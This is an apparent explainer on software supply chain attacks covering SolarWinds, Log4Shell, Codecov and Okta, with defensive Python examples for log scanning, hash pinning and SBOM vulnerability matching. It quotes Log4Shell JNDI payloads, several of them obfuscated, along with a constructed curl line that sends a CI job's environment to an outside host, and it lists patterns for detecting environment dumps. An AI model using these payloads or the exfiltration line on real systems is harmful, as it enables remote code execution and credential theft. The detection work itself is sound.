Software supply chain attacks have rapidly emerged as one of the most insidious cybersecurity threats facing organizations today. As software vendors, cloud providers, contractors and other third parties become increasingly interconnected, vulnerabilities introduced anywhere along an organization’s digital supply chain can have cascading impacts downstream.
Recent high-profile supply chain attacks like SolarWinds and Log4j have put these risks into stark relief. Clearly, traditional cybersecurity practices are no longer sufficient to protect organizations in today’s complex, hyperconnected business ecosystem. New proactive strategies and technologies are required to get ahead of software supply chain risks before they metastasize into full-blown crises.
This article provides cybersecurity leaders and technology decision makers with a comprehensive overview of the software supply chain attack landscape. It defines what supply chain attacks are, provides real-world examples, explores the business impacts, and offers actionable recommendations for identifying and mitigating supply chain vulnerabilities at scale.
What Exactly Are Software Supply Chain Attacks?
Before exploring defensive strategies, it’s important to establish precisely what constitutes a software supply chain attack.
A software supply chain encompasses all of the external vendors, open source libraries, software-as-a-service (SaaS) applications, infrastructure providers and other third parties that create and deliver the technology an organization relies on. The supply chain enables organizations to efficiently assemble best-of-breed solutions without having to build everything in-house.
However, this interconnectedness also introduces security risks. Vulnerabilities anywhere along the supply chain – whether in a vendor’s source code, build pipeline or IT infrastructure – can be exploited to compromise downstream customers. Attackers increasingly use the supply chain as an initial access vector into otherwise well-defended organizations, because a trusted vendor’s update channel or CI script arrives with a level of trust that an inbound connection from the internet never gets.
Supply chain attacks generally fall into three categories: infrastructure compromise, dependency attacks, and credential theft.
Infrastructure attacks target the IT infrastructure underpinning software delivery, such as a cloud provider’s or software vendor’s build, signing and distribution systems. Sensitive data, configurations, keys or credentials stored on this compromised infrastructure can then be intercepted and leveraged to infiltrate customer environments, or the artifacts the vendor ships can be altered at the source.
The SolarWinds and Codecov attacks are prime examples: in both, attackers who had gained access to the vendor’s own build or distribution infrastructure modified what the vendor shipped to customers, a trojanized Orion update in one case and a tampered uploader script in the other. Microsoft attributes the SolarWinds campaign to a nation-state actor it tracks as NOBELIUM, which compromised the build environment of a vendor whose software is deployed across US federal agencies in order to reach those customers.
Applications and services invariably rely on code libraries and modules from public repositories and package registries such as GitHub, npm, PyPI and Maven Central, as well as from commercial providers. Dependency attacks target these shared codebases, injecting malicious code that is then pulled into many finished software products and passed on to users, often transitively, through a dependency the integrating team never chose directly.
Vulnerabilities in widely used open source components, such as Log4Shell in the Log4j logging library, can be catastrophic precisely because the component is embedded, frequently without the end user’s knowledge, in products from virtually every major software vendor, exposing millions of users to exploitation.
Many supply chain attacks aim to steal vendor credentials, keys and certificates, allowing attackers to bypass security controls and masquerade as legitimate actors. With these keys to the kingdom, attackers can infiltrate downstream systems, access sensitive data, and move laterally across connected environments.
The January 2022 intrusion at identity provider Okta, which began with the compromise of a support engineer’s account at a third-party customer-support contractor, involved credential theft of this kind. With that support account’s access to Okta’s internal support tooling, the attacker was positioned to reach the tenants of Okta customers; Okta initially said up to 366 customers may have been affected, and later forensic work narrowed the number whose tenants were actually accessed to a small handful.
Real-World Software Supply Chain Attacks
Beyond defining what supply chain attacks entail in the abstract, it’s instructive to explore real-world examples that illustrate the diversity and complexity of these threats in action.
In late 2020, nation-state threat actors associated with Russia executed one of history’s most expansive and sophisticated supply chain cyber attacks. According to cybersecurity agencies in the US and UK, the attackers first breached the IT infrastructure of SolarWinds, an enterprise network monitoring software vendor.
The attackers then trojanized software updates for SolarWinds’ Orion product by inserting malicious code (later named SUNBURST) into the build process, so that the tainted builds carried SolarWinds’ legitimate code-signing signature. When installed by SolarWinds’ government and commercial customers, this code opened a stealthy backdoor to customer systems. SolarWinds estimated that up to 18,000 customers installed the corrupted Orion updates, although the attackers activated the backdoor against only a small subset of them.
This initial software supply chain attack opened the door for the threat actors to steal data and gain persistent access to high-value targets like the US Treasury, Justice Department, State Department, Department of Energy and components of the Defense Department. The White House called it “likely Russian in origin” and stated it would take years to fully assess and recover from the damage.
In December 2021, a severe vulnerability known as Log4Shell (CVE-2021-44228) was disclosed in Log4j, an extremely popular open source Java logging framework. Log4j is embedded in millions of enterprise applications and in products from vendors including Apple, Amazon, IBM, Cisco, HP, Tesla and countless others.
The flaw lies in Log4j’s message lookup feature. If attacker-controlled text such as ${jndi:ldap://attacker.example/x} reaches a logged message, for instance through a User-Agent header, vulnerable versions (2.0-beta9 through 2.14.1) perform a JNDI lookup that fetches and executes a Java class from the attacker’s server. The result is unauthenticated remote code execution on the logging host. It necessitated urgent patching across virtually the entire industry, and major disruptions occurred as organizations scrambled to find and update Log4j instances, many of them buried inside vendor products, across their sprawling application estates and supply chains.
Cybercriminals were quick to weaponize Log4j for cryptojacking schemes, botnet creation, and ransomware campaigns. The vulnerability remains under widespread exploitation globally. The identity data firm ForgeRock reported that 46% of its corporate customers were targeted by attempted Log4j exploits within just the first five days.
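A first step in “identifying” exposure is knowing whether anyone is probing you. The following is an added example, not code from the original article, that scans web-server access log lines for Log4Shell lookup strings. It handles the obfuscations attackers used in the first weeks (nested `${lower:…}`, `${upper:…}` and `${…:-…}` default-value lookups, plus URL encoding) by resolving innermost lookups until the string stops changing, then matching the resulting `${jndi:…}` payload. The log lines, IP addresses (documentation range) and payloads are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample of access-log lines; 203.0.113.0/24 is the documentation range.
# Lines 2-5 carry a JNDI lookup in plain, nested, default-value and URL-encoded forms.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:21:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:21:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:21:11 +0000] "GET /?x=${${lower:j}ndi:${lower:rmi}://203.0.113.7:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:14:21:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${::-l}dap://203.0.113.7/b}"
10.0.0.9 - - [10/Dec/2021:14:21:13 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once obfuscation is stripped.
JNDI = re.compile(r"\$\{\s*jndi:[^}]*\}", re.IGNORECASE)


def resolve(body: str):
    """Evaluate one innermost lookup of the kinds used for obfuscation.

    Returns the replacement text, or None if the lookup is not one we
    rewrite (e.g. the jndi: lookup itself, or ${date:...})."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${anything:-default} and ${::-x} both collapse to the default text
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def repl(m):
            nonlocal changed
            out = resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi_payloads(line: str) -> list:
    """Decode URL escapes, strip obfuscation, and return any ${jndi:...} payloads."""
    decoded = normalize_lookups(unquote(line))
    return JNDI.findall(decoded)


def scan_log(text: str) -> list:
    """Return (line_number, decoded_payload) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for payload in find_jndi_payloads(line):
            hits.append((n, payload))
    return hits


if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

The decoded payload is what you want in the alert: the `ldap://`, `rmi://` or `dns://` target tells you which host to block and whether the probe was a mass scanner or aimed at you. Scanning logs only shows attempts; whether an attempt succeeded depends on the Log4j version behind that endpoint, which is what the inventory work later in this article is for.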
In April 2021, Codecov, a code coverage reporting service, disclosed that attackers had modified its Bash Uploader, a script that customers (Codecov cited more than 29,000 at the time) download and run inside their CI pipelines to send coverage reports to Codecov’s SaaS platform.
Using a credential that had leaked through an error in Codecov’s Docker image creation process, the attackers altered the hosted script so that, alongside its normal work, it exported the environment variables of every CI job that ran it to an attacker-controlled server. CI environment variables routinely hold repository tokens, cloud credentials and signing keys, so each affected pipeline handed over the secrets needed to tamper with that customer’s own code and infrastructure. The modification went undetected from late January until April 1, 2021, when a customer noticed that the script’s hash no longer matched the published checksum.
Codecov notified hundreds of affected organizations across technology, finance, insurance, health care and government sectors, and several downstream vendors had to rotate keys and credentials exposed from their build pipelines. The attack’s broad reach illustrates the systemic risk of development pipelines that fetch and execute third-party scripts without pinning and verifying them.
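The practitioner lesson from Codecov is to never execute a vendor-hosted script at its current version; pin the hash you reviewed, verify before running, and fail closed. The following is an added example, not Codecov’s code or the article’s, using a constructed stand-in for a CI upload script and a constructed tampered copy with one appended line of the same shape as the Codecov modification (posting the job’s whole environment to an outside host). The pinned hash is computed from the clean script here so the example is self-contained; in a real pipeline it is a literal committed next to the pipeline definition. The host name and IP are placeholders.

```python
import hashlib
import hmac
import re

# Constructed stand-in for a vendor-supplied CI helper script (not Codecov's uploader).
GOOD_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
report="${1:-coverage.xml}"
curl -fsS -F "file=@${report}" https://uploader.example.invalid/upload
"""

# Constructed: the same script plus one line that ships the CI job's environment
# (tokens, keys, credentials) to a third party. 203.0.113.42 is a documentation address.
TAMPERED_SCRIPT = GOOD_SCRIPT + b'curl -sm 0.5 -d "$(env)" http://203.0.113.42/upload\n'

# Hash recorded at review time. In practice this is a hex literal committed with the
# pipeline; it is derived here only so the example runs stand-alone.
PINNED_SHA256 = hashlib.sha256(GOOD_SCRIPT).hexdigest()

# Constructs that dump the entire process environment. A legitimate upload script reads
# the specific variables it needs; it has no reason to serialize all of them.
ENV_DUMP_PATTERNS = [re.compile(p) for p in (
    r"\$\(\s*env\s*\)",   # $(env)
    r"\bprintenv\b",      # printenv
    r"\benv\s*\|",        # env | ...
)]


def hash_matches(script: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the script's SHA-256 against the pinned value."""
    return hmac.compare_digest(hashlib.sha256(script).hexdigest(), pinned_hex)


def env_dump_lines(script: bytes) -> list:
    """Return (line_number, text) for lines that serialize the whole environment."""
    flagged = []
    for n, line in enumerate(script.decode("utf-8", "replace").splitlines(), 1):
        if any(p.search(line) for p in ENV_DUMP_PATTERNS):
            flagged.append((n, line))
    return flagged


def vet_script(script: bytes, pinned_hex: str) -> dict:
    """Decide whether a fetched script may run.

    The decision rests on the pinned hash alone (fail closed). The pattern scan is an
    independent signal that tells the responder *why* a mismatch matters; it must not
    be used to approve a script whose hash does not match."""
    ok = hash_matches(script, pinned_hex)
    return {"run": ok, "hash_ok": ok, "env_dump": env_dump_lines(script)}


if __name__ == "__main__":
    for name, body in (("clean", GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, vet_script(body, PINNED_SHA256))
```

The same pattern applies to any `curl … | bash` step in a pipeline: fetch to a file, compare against the pinned digest, then execute. Updating the pin becomes a reviewed change in the repository, which is exactly the checkpoint Codecov’s customers lacked for two months.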
Business Impacts of Successful Supply Chain Attacks
Software supply chain attacks enable adversaries to sidestep traditional network perimeter defenses. The business impacts when these attacks succeed can be catastrophic on multiple levels:
- Compromise of Sensitive Data – Backdoor access to internal systems provided by supply chain attacks can lead to widespread compromise of sensitive data like intellectual property, customer information, financial records, strategic plans and more.
- System Outages & Business Disruption – Access to operational systems via compromised vendor channels can allow attackers to directly disrupt mission critical business processes by shutting down production applications, deleting data, interrupting services, etc.
- Loss of Customer Trust – High profile supply chain incidents damage corporate reputations and can cause customers to lose trust in the security and integrity of the impacted products and services.
- Financial Costs – Impacts like system downtime, data recovery/remediation, legal liabilities, notification costs and PR damage control can cost millions. The average total cost of a supply chain breach has been estimated at over $6 million.
- Compliance Fines & Sanctions – Failure to protect sensitive customer data or systems supporting critical infrastructure may violate regulatory obligations, resulting in fines, mandated corrective actions, and loss of operating licenses.
Four Keys to Securing Your Software Supply Chain
Given the potentially massive ramifications, cybersecurity leaders must make software supply chain risk management an urgent priority. Adopting these four best practices can help significantly improve resilience:
1. Inventory All External Connections
You can’t secure what you don’t understand. The first step is gaining full visibility into the many vendors, contractors and software components that comprise your technology ecosystem. Catalog all external connections across the enterprise, and build a software bill of materials (SBOM) for the code you ship and run, so that when the next Log4Shell lands you can answer “where do we have it?” in minutes rather than weeks.
Look beyond your immediate first-tier vendors to their partners and providers as well. Map out these interconnected relationships to identify high-risk nodes that could expose the broader network.
2. Assess Inherent Risk
With visibility established, develop a risk profile for each external partner and component. Assess factors like the sensitivity of their access, compliance with security controls, past breach incidents, and exposure to widely exploited components such as unpatched Log4j versions.
The higher risk entities warrant additional scrutiny and more stringent security requirements. Periodically re-evaluate risk profiles as partnerships and business relationships evolve.
3. Validate Security Controls
Don’t take vendors’ word when it comes to their own security practices. Validate that appropriate controls are demonstrably in place by having third parties complete standardized security assessments and by requiring evidence such as compliance reports, infrastructure configuration, and vulnerability scan results.
4. Monitor for Emerging Threats
Point-in-time assessments only provide a snapshot view of supplier risk. Continuously monitor your software supply chain for new threats and changes in partner risk profiles.
Employ tools that scour the dark web for stolen credentials, continuously match your dependency inventory against vulnerability feeds and malicious-package reports, and alert when vulnerabilities emerge in vendor environments. Immediately address any critical findings with partners.
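Steps 1 and 4 above meet in a single loop: turn a lockfile into an inventory, then match that inventory against advisory data whenever either side changes. The following is an added example, not the article’s or any vendor’s code, that parses a constructed lockfile in Gradle’s dependency-lock format, emits a minimal CycloneDX-style SBOM, and checks each component against an embedded advisory list. The one advisory included is the published affected range for CVE-2021-44228 (log4j-core 2.0-beta9 through 2.14.1); the sample dependency list is constructed, and the version-ordering rules are a simplification of Maven’s.

```python
import re
from dataclasses import dataclass

# Constructed sample in Gradle's dependency-lockfile format; not a real project.
SAMPLE_LOCKFILE = """\
# This is a Gradle generated file for dependency locking.
# Manual edits can mislead Gradle into a corrupt state.
com.fasterxml.jackson.core:jackson-databind:2.13.0=compileClasspath,runtimeClasspath
org.apache.logging.log4j:log4j-api:2.14.1=compileClasspath,runtimeClasspath
org.apache.logging.log4j:log4j-core:2.14.1=compileClasspath,runtimeClasspath
empty=testCompileClasspath
"""

# Affected range as published for CVE-2021-44228 (Log4Shell). In production this list
# comes from a feed such as OSV or the GitHub Advisory Database, not from source code.
ADVISORIES = [
    {"id": "CVE-2021-44228", "group": "org.apache.logging.log4j", "artifact": "log4j-core",
     "introduced": "2.0-beta9", "last_affected": "2.14.1"},
]

# Pre-release qualifiers sort below a final release of the same number.
QUALIFIER_RANK = {"alpha": 0, "beta": 1, "milestone": 2, "rc": 3}
RELEASE_RANK = 9


def version_key(v: str):
    """Map '2.0-beta9' / '2.14.1' to a tuple that sorts in release order.

    Simplified Maven ordering: numeric parts, then qualifier rank, then qualifier number."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:[-.]([A-Za-z]+)(\d*))?", v)
    if not m:
        raise ValueError(f"unparseable version: {v}")
    nums = [int(x) for x in m.group(1).split(".")]
    nums += [0] * (4 - len(nums))  # 2.0 == 2.0.0 for range checks
    if m.group(2):
        return (tuple(nums), QUALIFIER_RANK.get(m.group(2).lower(), 0), int(m.group(3) or 0))
    return (tuple(nums), RELEASE_RANK, 0)


@dataclass(frozen=True)
class Component:
    group: str
    artifact: str
    version: str

    @property
    def purl(self) -> str:
        # Package URL form for Maven coordinates, usable as a stable SBOM identifier.
        return f"pkg:maven/{self.group}/{self.artifact}@{self.version}"


def parse_gradle_lockfile(text: str) -> list:
    """Each locked line is group:artifact:version=config[,config...]."""
    comps = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("empty="):
            continue
        coords, _, _configs = line.partition("=")
        group, artifact, version = coords.split(":")
        comps.append(Component(group, artifact, version))
    return comps


def to_cyclonedx(comps: list) -> dict:
    """Minimal CycloneDX-shaped document: enough to hand to a scanner or store as inventory."""
    return {"bomFormat": "CycloneDX", "specVersion": "1.5",
            "components": [{"type": "library", "group": c.group, "name": c.artifact,
                            "version": c.version, "purl": c.purl} for c in comps]}


def is_affected(version: str, adv: dict) -> bool:
    k = version_key(version)
    return version_key(adv["introduced"]) <= k <= version_key(adv["last_affected"])


def find_vulnerable(comps: list, advisories: list = ADVISORIES) -> list:
    """Return (purl, advisory id) for every component inside an advisory's affected range."""
    return [(c.purl, a["id"]) for c in comps for a in advisories
            if c.group == a["group"] and c.artifact == a["artifact"] and is_affected(c.version, a)]


if __name__ == "__main__":
    inventory = parse_gradle_lockfile(SAMPLE_LOCKFILE)
    print(to_cyclonedx(inventory))
    for purl, cve in find_vulnerable(inventory):
        print("VULNERABLE:", purl, cve)
```

Two design points carry over to real tooling. First, match on exact coordinates, not names: `log4j-api` shares the version number but is not in the CVE-2021-44228 range, and a substring match would produce false positives across every ecosystem. Second, treat version ordering as its own problem; pre-release qualifiers are where naive string comparison silently misses the `2.0-beta9` start of the Log4Shell range. Production SBOM generators and matchers (for example CycloneDX plugins, Syft and OSV-Scanner) implement full ecosystem-specific ordering; the loop itself is what step 4 asks you to run continuously.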
Closing the Software Supply Chain Security Gap
As software supply chain attacks proliferate in frequency and impact, organizations can no longer cling to reactive security practices. With critical business functions relying more than ever on third parties, the attack surface has expanded well beyond the traditional network perimeter.
By taking a data-driven, intelligence-led approach, cybersecurity leaders can get ahead of supply chain risk. They can proactively identify points of exposure, validate vendor security, detect emerging threats and compel corrective actions across the external attack surface early enough to prevent compromises from occurring in the first place.
Those who embrace these next-gen approaches will be well positioned to protect their organizations from the growing threat of software supply chain attacks in our increasingly interconnected world. The alternative is to wait helplessly for the inevitable breach notice from a compromised supplier that lands your company on tomorrow’s front page news headlines. The choice is clear.